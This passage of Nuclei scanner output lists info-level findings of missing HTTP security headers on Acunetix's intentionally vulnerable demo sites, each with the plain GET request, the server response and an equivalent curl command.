\\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.135869926Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.563147773Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.56318012Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.563209603Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.563223168Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.848136551Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.84816651Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr 